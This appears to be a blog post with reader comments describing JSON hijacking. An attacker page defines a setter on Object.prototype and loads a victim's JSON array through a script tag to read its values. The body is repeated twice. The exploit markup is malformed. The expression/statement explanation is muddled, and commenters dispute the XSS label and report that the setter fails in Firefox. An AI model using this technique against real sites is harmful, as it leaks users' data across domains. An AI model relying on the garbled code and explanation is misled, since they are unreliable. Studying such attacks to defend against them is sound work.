A web application is sending data in this format:
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this is a valid JSON, before moving on lets understand an important concept:
1. Javscript expression
2. javascript statement
javscript expressions are not executed by javascript parser, but statements are:
for ex:
<script>
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
</script>
this will not be executed, that is, objects won't be created. The above example is for a javascript expression.
But now when it is converted into a statement as given below:
<script>
[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]
</script>
this gets executed.
The way to exploit this is by declaring a setter for one of the objects, for ex. "t":
<script>
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script> defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
</script>
Until now there is no known way of exploiting a java expression based JSON.
Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this is a valid JSON, before moving on lets understand an important concept:
1. Javscript expression
2. javascript statement
javscript expressions are not executed by javascript parser, but statements are:
for ex:
<script>
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
</script>
this will not be executed, that is, objects won't be created. The above example is for a javascript expression.
But now when it is converted into a statement as given below:
<script>
[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]
</script>
this gets executed.
The way to exploit this is by declaring a setter for one of the objects, for ex. "t":
<script>
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script> defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
</script>
Until now there is no known way of exploiting a java expression based JSON.
Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).
Posts
6 comments:
its "JSON" not jason ... javascript object notation
@ Anonymous: Sorry, it was a typo! Thanks for noticing, I rectified it.
The vulnerability does not look like XSS, it is data leakage, the example shown extracts data from JS object from different domain. The title is misleading.
Are u going to change the heading?? it is not XSS???
i agree with above comment, author should correct or explains what he meaning by this.
The setter does not work with Firefox, is there any specific browser you tried this in? Can you provide any links where this function is better explained?
Post a Comment